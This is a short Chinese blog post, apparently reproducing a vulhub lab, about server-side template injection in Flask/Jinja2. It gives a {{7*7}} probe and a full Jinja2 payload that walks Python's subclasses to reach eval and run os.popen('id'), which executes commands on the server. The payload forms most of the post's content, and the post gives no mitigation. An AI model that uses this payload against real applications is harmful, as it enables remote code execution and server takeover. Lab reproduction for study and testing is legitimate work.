0
点赞
收藏
分享

微信扫一扫

Flask(Jinja2) 服务端模板注入漏洞(SSTI)

phpworkerman 2023-11-10 阅读 34
flaskpython网络安全信息安全web安全
加载失败

Flask(Jinja2) 服务端模板注入漏洞(SSTI)

参考 https://www.freebuf.com/articles/web/260504.html
验证漏洞存在 ?name={{7*7}}
回显49说明漏洞存在
在这里插入图片描述

vulhub给出的payload:

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

在这里插入图片描述

举报

相关推荐

Flask(Jinja2) 服务端模板注入漏洞

flaskpython后端

SSTI模板注入(jinja2)

安全web安全

【Web】Flask|Jinja2 SSTI

pycharmidepython

Flask 使用Jinja2模板引擎

elkkafka分布式filebeat

【flask】 Jinja2

python迭代html

jinja2模板

ipad配置文件pythonLinux系统/运维

【Python】Web学习笔记_flask(7)——Jinja2模板(1)

python学习笔记flaskweb前端

【django】配置Jinja2模板引擎【2】

djangopython后端

【Python系列】Jinja2 模板引擎

python开发语言htmlPythonHTMLJavaScript前端开发

jinja2

pythonjinja2迭代模板函数htmlPython后端开发
0 条评论
加载失败